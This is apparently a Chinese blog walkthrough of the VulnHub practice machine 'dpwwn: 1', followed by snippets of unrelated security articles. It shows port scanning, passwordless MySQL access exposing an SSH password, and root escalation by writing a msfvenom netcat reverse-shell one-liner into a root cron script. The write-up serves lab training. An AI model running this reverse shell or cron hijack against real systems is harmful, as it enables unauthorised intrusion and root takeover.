代码编织梦想

简介

这个靶场和我之前玩的 Born2root's 有点类似,都是通过定时任务反弹shll

Name:dpwwn: 1
靶机地址:dpwwn: 1 ~ VulnHub
靶机介绍:
This boot2root is a linux based virtual machine and has been tested using VMware workstation 14.
The network interface of VM will take it’s IP settings from DHCP (Network Mode: NAT).
Goal: Gain the root privilege and obtain the content of dpwwn-01-FLAG.txt under /root Directory.
Note: Tested on VMware workstation 14.
Difficulty: Easy/helpful for beginners.

信息搜集

靶机 IP : 192.168.1.135

1
nmap -A 192.168.1.135

 

使用 NMAP 进行端口探测发现靶机开放了 22803306 端口,先从 http 下手看看:

1
http://192.168.1.135

在 web 页面上没有得到可利用的信息,只是得到了靶机的中简介为 Apache ,网站绝对路径有可能是:/var/www/html/ , 接下来对它进行目录扫描看看有没有泄露一些铭感信息或者文件:

1
dirb http://192.168.1.135

打开 info.php 后发现了是网站的 phpinfo 页面,其中网站绝对路径为:

1
DOCUMENT_ROOT: 	/var/www/html 

从 web 页面中没找到突破点,接下来换到 3306(Mysql) 服务上,尝试看看能不能登陆到它的 Mysql 数据库(空密码):

1
mysql -h 192.168.1.135 -u root -p

Mysql 未授权登陆成功之后,发现 ssh 数据库里有一个 users 表,里面是一个用户的账号密码信息:

1
2
3
4
5
6
MariaDB [ssh]> select * from users;
+----+----------+---------------------+
| id | username | password            |                                                                                                                                                                      
+----+----------+---------------------+                                                                                                                                                                      
|  1 | mistic   | testP@$$swordmistic |                                                                                                                                                                      
+----+----------+---------------------+ 

这个时候我们尝试看看能不能登陆到它的 ssh :

1
ssh mistic@192.168.1.135

成功登陆到 ssh ,接下来就是一系列提权操作!

定时任务反弹shell提权

通过查看定时任务发现了一个文件是每分钟以 root 用户去运行:

1
cat /etc/crontab

文件名为 logrot.sh ,既然是 bash 脚本文件那么我就先利用 MSF 生成一个 Payload 用于 Netcat 反弹 shell:

1
2
msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.1.128 LPORT=4444 R
注释:R参数是个万能参数,既可以用在php上,也可以用在exe上等等。如果你后期还要对payload进行多次的编辑,那么建议你使用R参数 。

生成得到的 Payload 为:

1
mkfifo /tmp/fzxvc; nc 192.168.1.128 4444 0</tmp/fzxvc | /bin/sh >/tmp/fzxvc 2>&1; rm /tmp/fzxvc

我首先新建了一个文件 1 ,然后把 MSF 生成的 Payload Copy 到文件 1 里面,接着使用 cat 命令和管道来把内容传到 logrot.sh 文件里:

这个时候 KALI Netcat 监听 4444 端口:

1
nc -lvvp 4444

最终也是在 root 目录下拿到 dpwwn-01-FLAG.txt

总结

这次靶机挺简单的,主要还是要掌握 Linux 定时任务反弹 SHELL 这个操作!

交流群:

 微信公众号:

 知识星球:

 

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36304918/article/details/124679436

thinkphp5.0.x远程rce复现_redteam的博客-爱代码爱编程

0x1 前言 之前看到大佬们在网上爆出tp远程代码执行,我就想着来复现一波,所以写篇文章做个笔记。 0x2漏洞复现 首先去ThinkPhP官网下载他的一个框架:ThinkPHP下载 在这里我选择的是ThinkPHP5.0

游戏中常用英汉互译_不吃胡萝的博客-爱代码爱编程

收集整理了一下在游戏中常用的各种名词的英汉互译,妈妈再也不用担心我不会起变量名啦~ Electronic Game电子游戏 AVG(Adventure Game)冒险类游戏 Graphic Adventure图形冒险类游戏

prime: 1靶机-walkthrough_1nsight的博客-爱代码爱编程

Prime: 1靶机-Walkthrough 靶机地址 难度:中等 博客中如有任何问题,恳请批评指正,万分感谢。个人邮箱:hutuxiaohai@gmail.com 存疑、待解决 msfvenom-zsh

ha:isro靶机 writeup(并不完整)-爱代码爱编程

靶机地址: https://www.vulnhub.com/entry/ha-isro,376/ 根据作者的提示,一共四个flag,主要测试枚举的能力,后面我才发现是枚举说的是社工。。。 AryabhataBhaskaraMangalyaanChandrayaan 2 0x01 遇事不决nmap nmap扫描结果: 192.168.109.129

No.25-VulnHub-Temple of Doom: 1-Walkthrough渗透学习-爱代码爱编程

** VulnHub-Temple of Doom: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/temple-of-doom-1,243/ 靶机难度:中级(CTF) 靶机发布日期:2018年6月8日 靶机描述: [+]由https://twitter.com/0katz创建的CTF [+]

No.27-VulnHub-Pinky's Palace: v2-Walkthrough渗透学习-爱代码爱编程

** VulnHub-Pinky’s Palace: v2-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/pinkys-palace-v2,229/ 靶机难度:中级(CTF) 靶机发布日期:2018年3月18日 靶机描述:一个现实的Boot2Root。获得对系统的访问权限并阅读/root/root

No.34-VulnHub-Wallaby's: Nightmare (v1.0.2)-Walkthrough渗透学习-爱代码爱编程

** VulnHub-Wallaby’s: Nightmare (v1.0.2)-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/ 靶机难度:中级(CTF) 靶机发布日期:2016年12月22日 靶机描述: 这是我的第一台boot2root机器

No.38-VulnHub-Tommy Boy: 1-Walkthrough渗透学习-爱代码爱编程

** VulnHub-Tommy Boy: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/tommy-boy-1,157/ 靶机难度:中级(CTF) 靶机发布日期:2016年7月27日 靶机描述: 圣施耐克!汤米男孩需要您的帮助! 卡拉汉汽车公司终于进入了现代技术领域,并建立了一个Web服务器

No.102-HackTheBox-Linux-Joker-Walkthrough渗透学习-爱代码爱编程

** HackTheBox-Linux-Joker-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/20 靶机难度:中级(4.0/10) 靶机发布日期:2017年10月17日 靶机描述: Joker can be a very tough machine for

No.181-HackTheBox-Linux-PlayerTwo-Walkthrough渗透学习-爱代码爱编程

** HackTheBox-Linux-PlayerTwo-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/221 靶机难度:疯狂(5.0/10) 靶机发布日期:2020年6月23日 靶机描述: PlayerTwo is an insane difficulty L

Hacknos-3-爱代码爱编程

kali ip:192.168.1.193 target ip:192.168.1.202 靶机下载:hackNos: Os-hackNos-3 ~ VulnHub 靶机目标:普通用户的user.txt和root用户的root.txt 步骤一:使用nmap进行网络扫描,发现目标192.168.1.202为入侵目标靶机... nmap -sn 19

靶机Hacknos-3-爱代码爱编程

kali ip:192.168.1.131 target ip:192.168.1.23 靶机下载:hackNos: Os-hackNos-3 ~ VulnHub 靶机目标:普通用户的user.txt和root用户的root.txt 步骤一:使用nmap进行网络扫描,发现目标192.168.1.23为入侵目标靶机... nmap -sn 1

IIS-解析漏洞(上)-爱代码爱编程

漏洞介绍与成因 在IIS-6.0这个版本中,搭建的服务器是2003系统中所造成的解析漏洞的两种情况。 1 2 3 4 5 情况一:/liuwx.asp/liuwx.jpg 介绍:在网站的根目录下创建一个命名为liuwx.asp的文件夹,该文件夹下有一个liuwx.jpg的图片木马,也就是说该目录下的所有文件都会被当做asp脚本文件 利用:访问

Nginx-解析漏洞-爱代码爱编程

漏洞描述 由于Nginx.conf的如下配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://liuwx.cn/test.png/.php (url结尾不一定是‘.php’,任何服务器端不存在的php文件均可,比如’a.php’),其中test.png是我们上传的包含PHP代码的照片文件。 漏洞复现环境 1

Windows提权之本地提权-信息搜集-爱代码爱编程

提权简介 在渗透过程中,通过各种方式获取到一枚cmdshell,但是这个cmdshell的权限相对比较低,无法让我们做我们想做的事情, 比如获取系统密码,比如获取数据库信息,比如拿到服务器中的另一个站点的权限那么这个时候就需要对当前的cmdshell进行权限的提升,整个过程叫:权限提升,简称提权 信息搜集 假设我们现在已经获取到了一枚WebSh